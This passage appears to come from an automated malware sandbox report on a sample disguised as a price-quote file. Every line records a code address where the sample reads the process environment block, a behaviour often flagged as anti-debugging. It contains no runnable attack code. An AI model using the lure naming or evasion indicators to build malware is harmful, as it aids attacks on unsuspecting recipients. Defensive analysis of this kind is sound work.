Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC63C0 mov eax, dword ptr fs:[00000030h]	10_2_01AC63C0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AEE3DB mov eax, dword ptr fs:[00000030h]	10_2_01AEE3DB
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AEE3DB mov eax, dword ptr fs:[00000030h]	10_2_01AEE3DB
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AEE3DB mov ecx, dword ptr fs:[00000030h]	10_2_01AEE3DB
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AEE3DB mov eax, dword ptr fs:[00000030h]	10_2_01AEE3DB
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AE43D4 mov eax, dword ptr fs:[00000030h]	10_2_01AE43D4
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AE43D4 mov eax, dword ptr fs:[00000030h]	10_2_01AE43D4
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B18324 mov eax, dword ptr fs:[00000030h]	10_2_01B18324
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B18324 mov ecx, dword ptr fs:[00000030h]	10_2_01B18324
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B18324 mov eax, dword ptr fs:[00000030h]	10_2_01B18324
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B18324 mov eax, dword ptr fs:[00000030h]	10_2_01B18324
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7A30B mov eax, dword ptr fs:[00000030h]	10_2_01A7A30B
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7A30B mov eax, dword ptr fs:[00000030h]	10_2_01A7A30B
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7A30B mov eax, dword ptr fs:[00000030h]	10_2_01A7A30B
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A3C310 mov ecx, dword ptr fs:[00000030h]	10_2_01A3C310
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A60310 mov ecx, dword ptr fs:[00000030h]	10_2_01A60310
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AE437C mov eax, dword ptr fs:[00000030h]	10_2_01AE437C
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B0A352 mov eax, dword ptr fs:[00000030h]	10_2_01B0A352
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]	10_2_01AC2349
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]	10_2_01AC2349
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]	10_2_01AC2349
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]	10_2_01AC2349
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]	10_2_01AC2349
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]	10_2_01AC2349
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]	10_2_01AC2349
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]	10_2_01AC2349
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]	10_2_01AC2349
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]	10_2_01AC2349
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]	10_2_01AC2349
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]	10_2_01AC2349
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]	10_2_01AC2349
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]	10_2_01AC2349
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]	10_2_01AC2349
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC035C mov eax, dword ptr fs:[00000030h]	10_2_01AC035C
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC035C mov eax, dword ptr fs:[00000030h]	10_2_01AC035C
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC035C mov eax, dword ptr fs:[00000030h]	10_2_01AC035C
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC035C mov ecx, dword ptr fs:[00000030h]	10_2_01AC035C
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC035C mov eax, dword ptr fs:[00000030h]	10_2_01AC035C
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC035C mov eax, dword ptr fs:[00000030h]	10_2_01AC035C
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AE8350 mov ecx, dword ptr fs:[00000030h]	10_2_01AE8350
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B1634F mov eax, dword ptr fs:[00000030h]	10_2_01B1634F
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A502A0 mov eax, dword ptr fs:[00000030h]	10_2_01A502A0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A502A0 mov eax, dword ptr fs:[00000030h]	10_2_01A502A0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AD62A0 mov eax, dword ptr fs:[00000030h]	10_2_01AD62A0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AD62A0 mov ecx, dword ptr fs:[00000030h]	10_2_01AD62A0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AD62A0 mov eax, dword ptr fs:[00000030h]	10_2_01AD62A0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AD62A0 mov eax, dword ptr fs:[00000030h]	10_2_01AD62A0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AD62A0 mov eax, dword ptr fs:[00000030h]	10_2_01AD62A0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AD62A0 mov eax, dword ptr fs:[00000030h]	10_2_01AD62A0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7E284 mov eax, dword ptr fs:[00000030h]	10_2_01A7E284
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7E284 mov eax, dword ptr fs:[00000030h]	10_2_01A7E284
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC0283 mov eax, dword ptr fs:[00000030h]	10_2_01AC0283
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC0283 mov eax, dword ptr fs:[00000030h]	10_2_01AC0283
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC0283 mov eax, dword ptr fs:[00000030h]	10_2_01AC0283
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A502E1 mov eax, dword ptr fs:[00000030h]	10_2_01A502E1
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A502E1 mov eax, dword ptr fs:[00000030h]	10_2_01A502E1
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A502E1 mov eax, dword ptr fs:[00000030h]	10_2_01A502E1
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4A2C3 mov eax, dword ptr fs:[00000030h]	10_2_01A4A2C3
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4A2C3 mov eax, dword ptr fs:[00000030h]	10_2_01A4A2C3
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4A2C3 mov eax, dword ptr fs:[00000030h]	10_2_01A4A2C3
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4A2C3 mov eax, dword ptr fs:[00000030h]	10_2_01A4A2C3
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4A2C3 mov eax, dword ptr fs:[00000030h]	10_2_01A4A2C3
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B162D6 mov eax, dword ptr fs:[00000030h]	10_2_01B162D6
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A3823B mov eax, dword ptr fs:[00000030h]	10_2_01A3823B
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A44260 mov eax, dword ptr fs:[00000030h]	10_2_01A44260
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A44260 mov eax, dword ptr fs:[00000030h]	10_2_01A44260
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A44260 mov eax, dword ptr fs:[00000030h]	10_2_01A44260
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A3826B mov eax, dword ptr fs:[00000030h]	10_2_01A3826B
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AF0274 mov eax, dword ptr fs:[00000030h]	10_2_01AF0274
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AF0274 mov eax, dword ptr fs:[00000030h]	10_2_01AF0274
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AF0274 mov eax, dword ptr fs:[00000030h]	10_2_01AF0274
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AF0274 mov eax, dword ptr fs:[00000030h]	10_2_01AF0274
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AF0274 mov eax, dword ptr fs:[00000030h]	10_2_01AF0274
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AF0274 mov eax, dword ptr fs:[00000030h]	10_2_01AF0274
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AF0274 mov eax, dword ptr fs:[00000030h]	10_2_01AF0274
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AF0274 mov eax, dword ptr fs:[00000030h]	10_2_01AF0274
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AF0274 mov eax, dword ptr fs:[00000030h]	10_2_01AF0274
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AF0274 mov eax, dword ptr fs:[00000030h]	10_2_01AF0274
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AF0274 mov eax, dword ptr fs:[00000030h]	10_2_01AF0274
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AF0274 mov eax, dword ptr fs:[00000030h]	10_2_01AF0274
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B1625D mov eax, dword ptr fs:[00000030h]	10_2_01B1625D
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC8243 mov eax, dword ptr fs:[00000030h]	10_2_01AC8243
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC8243 mov ecx, dword ptr fs:[00000030h]	10_2_01AC8243
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A3A250 mov eax, dword ptr fs:[00000030h]	10_2_01A3A250
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A46259 mov eax, dword ptr fs:[00000030h]	10_2_01A46259
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AFA250 mov eax, dword ptr fs:[00000030h]	10_2_01AFA250
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AFA250 mov eax, dword ptr fs:[00000030h]	10_2_01AFA250
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC05A7 mov eax, dword ptr fs:[00000030h]	10_2_01AC05A7
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC05A7 mov eax, dword ptr fs:[00000030h]	10_2_01AC05A7
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC05A7 mov eax, dword ptr fs:[00000030h]	10_2_01AC05A7
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A645B1 mov eax, dword ptr fs:[00000030h]	10_2_01A645B1
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A645B1 mov eax, dword ptr fs:[00000030h]	10_2_01A645B1
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A42582 mov eax, dword ptr fs:[00000030h]	10_2_01A42582
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A42582 mov ecx, dword ptr fs:[00000030h]	10_2_01A42582
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A74588 mov eax, dword ptr fs:[00000030h]	10_2_01A74588
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7E59C mov eax, dword ptr fs:[00000030h]	10_2_01A7E59C
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]	10_2_01A6E5E7
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]	10_2_01A6E5E7
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]	10_2_01A6E5E7
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]	10_2_01A6E5E7
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]	10_2_01A6E5E7
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]	10_2_01A6E5E7
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]	10_2_01A6E5E7
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]	10_2_01A6E5E7
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A425E0 mov eax, dword ptr fs:[00000030h]	10_2_01A425E0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7C5ED mov eax, dword ptr fs:[00000030h]	10_2_01A7C5ED
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7C5ED mov eax, dword ptr fs:[00000030h]	10_2_01A7C5ED
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7E5CF mov eax, dword ptr fs:[00000030h]	10_2_01A7E5CF
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7E5CF mov eax, dword ptr fs:[00000030h]	10_2_01A7E5CF
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A465D0 mov eax, dword ptr fs:[00000030h]	10_2_01A465D0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7A5D0 mov eax, dword ptr fs:[00000030h]	10_2_01A7A5D0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7A5D0 mov eax, dword ptr fs:[00000030h]	10_2_01A7A5D0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A50535 mov eax, dword ptr fs:[00000030h]	10_2_01A50535
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A50535 mov eax, dword ptr fs:[00000030h]	10_2_01A50535
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A50535 mov eax, dword ptr fs:[00000030h]	10_2_01A50535
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A50535 mov eax, dword ptr fs:[00000030h]	10_2_01A50535
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A50535 mov eax, dword ptr fs:[00000030h]	10_2_01A50535
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A50535 mov eax, dword ptr fs:[00000030h]	10_2_01A50535
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6E53E mov eax, dword ptr fs:[00000030h]	10_2_01A6E53E
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6E53E mov eax, dword ptr fs:[00000030h]	10_2_01A6E53E
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6E53E mov eax, dword ptr fs:[00000030h]	10_2_01A6E53E
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6E53E mov eax, dword ptr fs:[00000030h]	10_2_01A6E53E
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6E53E mov eax, dword ptr fs:[00000030h]	10_2_01A6E53E
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AD6500 mov eax, dword ptr fs:[00000030h]	10_2_01AD6500
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B14500 mov eax, dword ptr fs:[00000030h]	10_2_01B14500
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B14500 mov eax, dword ptr fs:[00000030h]	10_2_01B14500
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B14500 mov eax, dword ptr fs:[00000030h]	10_2_01B14500
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B14500 mov eax, dword ptr fs:[00000030h]	10_2_01B14500
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B14500 mov eax, dword ptr fs:[00000030h]	10_2_01B14500
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B14500 mov eax, dword ptr fs:[00000030h]	10_2_01B14500
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B14500 mov eax, dword ptr fs:[00000030h]	10_2_01B14500
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7656A mov eax, dword ptr fs:[00000030h]	10_2_01A7656A
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7656A mov eax, dword ptr fs:[00000030h]	10_2_01A7656A
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7656A mov eax, dword ptr fs:[00000030h]	10_2_01A7656A
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A48550 mov eax, dword ptr fs:[00000030h]	10_2_01A48550
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A48550 mov eax, dword ptr fs:[00000030h]	10_2_01A48550
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A464AB mov eax, dword ptr fs:[00000030h]	10_2_01A464AB
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A744B0 mov ecx, dword ptr fs:[00000030h]	10_2_01A744B0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ACA4B0 mov eax, dword ptr fs:[00000030h]	10_2_01ACA4B0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AFA49A mov eax, dword ptr fs:[00000030h]	10_2_01AFA49A
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A404E5 mov ecx, dword ptr fs:[00000030h]	10_2_01A404E5
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A3E420 mov eax, dword ptr fs:[00000030h]	10_2_01A3E420
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A3E420 mov eax, dword ptr fs:[00000030h]	10_2_01A3E420
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A3E420 mov eax, dword ptr fs:[00000030h]	10_2_01A3E420
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A3C427 mov eax, dword ptr fs:[00000030h]	10_2_01A3C427
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC6420 mov eax, dword ptr fs:[00000030h]	10_2_01AC6420
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC6420 mov eax, dword ptr fs:[00000030h]	10_2_01AC6420
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC6420 mov eax, dword ptr fs:[00000030h]	10_2_01AC6420
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC6420 mov eax, dword ptr fs:[00000030h]	10_2_01AC6420
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC6420 mov eax, dword ptr fs:[00000030h]	10_2_01AC6420
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC6420 mov eax, dword ptr fs:[00000030h]	10_2_01AC6420
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC6420 mov eax, dword ptr fs:[00000030h]	10_2_01AC6420
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7A430 mov eax, dword ptr fs:[00000030h]	10_2_01A7A430
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A78402 mov eax, dword ptr fs:[00000030h]	10_2_01A78402
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A78402 mov eax, dword ptr fs:[00000030h]	10_2_01A78402
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A78402 mov eax, dword ptr fs:[00000030h]	10_2_01A78402
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ACC460 mov ecx, dword ptr fs:[00000030h]	10_2_01ACC460
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6A470 mov eax, dword ptr fs:[00000030h]	10_2_01A6A470
